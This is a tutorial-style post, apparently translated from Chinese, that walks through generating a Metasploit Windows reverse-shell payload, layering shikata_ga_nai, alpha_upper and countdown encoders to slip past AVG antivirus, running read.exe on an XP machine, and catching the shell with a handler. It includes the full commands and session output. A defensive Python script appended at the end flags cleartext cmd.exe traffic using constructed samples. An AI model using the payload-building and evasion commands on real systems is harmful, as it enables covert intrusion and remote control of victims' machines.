Launching a remote shell with Metasploit without being detected by antivirus software

root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o read.exe
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)
[*] x86/alpha_upper succeeded with size 966 (iteration=1)
[*] x86/alpha_upper succeeded with size 2000 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 2029 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 2058 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 2087 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2116 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2145 (iteration=5)
[*] x86/countdown succeeded with size 2163 (iteration=1)
[*] x86/countdown succeeded with size 2181 (iteration=2)
[*] x86/countdown succeeded with size 2199 (iteration=3)
[*] x86/countdown succeeded with size 2217 (iteration=4)
[*] x86/countdown succeeded with size 2235 (iteration=5)

real    1m33.468s
user    0m52.195s
sys     0m39.830s
root@bt:~#


Upload read.exe to the XP machine and run it from cmd; the antivirus software reports no threat:


Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>cd ..

C:\Documents and Settings>cd ..

C:\>read.exe


Then enter the following command to start the handler:

root@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 E
[*] Please wait while we load the module tree...

# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

PAYLOAD => windows/shell_reverse_tcp
LHOST => 192.168.1.11
LPORT => 31337
[*] Started reverse handler on 192.168.1.11:31337 
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.11:31337 -> 192.168.1.142:1181) at 2013-04-28 06:06:36 -0400

Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\>dir
dir
 驱动器 C 中的卷没有标签。
 卷的序列号是 3052-FA52

 C:\ 的目录

2012-03-24  11:55                 0 AUTOEXEC.BAT
2013-04-28  16:06       131,820,480 avg_free_x86_all_2013.exe
2012-03-24  11:55                 0 CONFIG.SYS
2012-03-24  11:59    <DIR>          Documents and Settings
2013-04-28  17:08    <DIR>          Program Files
2013-04-29  22:17            73,802 read.exe
2013-04-28  21:37                38 readme.txt
2013-04-28  15:19    <DIR>          ruby
2013-04-28  20:45    <DIR>          WINDOWS
               5 个文件    131,894,320 字节
               4 个目录  5,329,256,448 可用字节

C:\>

This opens a remote shell without "alerting" the AVG antivirus software.
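A defender-side example, added here and not part of the original post: the encoder chain only hides read.exe from the antivirus's static scan, while the shell itself is the same cleartext cmd.exe session the handler transcript shows, sent by the host that connects out. The script below scores reassembled per-flow client data for locale-independent cmd.exe banner and prompt artefacts; the flows are constructed samples modelled on the session above, and the Flow type and scoring weights are assumptions of this example.

```python
import re
from dataclasses import dataclass

# Locale-independent pieces of the cmd.exe banner. The Chinese XP in the post
# prints "[版本 5.1.2600]" and "版权所有", so only the ASCII parts are matched:
# the version triple and "Microsoft Corp." survive in every locale.
BANNER_RE = re.compile(rb"Microsoft Windows[^\r\n]{0,40}\d+\.\d+\.\d+\]")
COPYRIGHT_RE = re.compile(rb"\(C\)[^\r\n]{0,40}Microsoft Corp\.")
PROMPT_RE = re.compile(rb"(?m)^[A-Za-z]:\\[^\r\n]{0,200}>")

@dataclass
class Flow:                 # assumed shape of a reassembled TCP flow
    src: str                # connection initiator (the host that ran read.exe)
    dst: str
    dport: int
    client_data: bytes      # bytes sent by the initiator

def score_flow(flow: Flow) -> int:
    """Weight of cmd.exe artefacts in the initiator-to-server direction."""
    s = 0
    if BANNER_RE.search(flow.client_data):
        s += 2
    if COPYRIGHT_RE.search(flow.client_data):
        s += 1
    if PROMPT_RE.search(flow.client_data):
        s += 2
    return s

def find_reverse_cmd_shells(flows, threshold=3):
    """Return (src, dst, dport, score) for flows whose initiator is
    sending what looks like a cleartext cmd.exe session."""
    return [(f.src, f.dst, f.dport, score_flow(f))
            for f in flows if score_flow(f) >= threshold]

# Constructed sample traffic (not a real capture) modelled on the post's
# session: the XP box connects out to 192.168.1.11:31337 and the first bytes
# it sends are the GBK-encoded cmd.exe banner followed by a prompt.
SAMPLE_FLOWS = [
    Flow("192.168.1.142", "192.168.1.11", 31337,
         ("Microsoft Windows XP [版本 5.1.2600]\r\n"
          "(C) 版权所有 1985-2001 Microsoft Corp.\r\n\r\n"
          "C:\\>").encode("gbk")),
    # Ordinary web request (placeholder server): mentions Windows, no shell.
    Flow("192.168.1.142", "203.0.113.10", 80,
         b"GET / HTTP/1.1\r\nHost: example.com\r\n"
         b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\r\n"),
    # A banner pasted into a chat message: banner but no prompt, below threshold.
    Flow("192.168.1.142", "192.168.1.50", 5222,
         b"<body>my box says: Microsoft Windows XP [Version 5.1.2600]</body>"),
]

if __name__ == "__main__":
    for hit in find_reverse_cmd_shells(SAMPLE_FLOWS):
        print("possible cleartext reverse shell:", hit)
```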
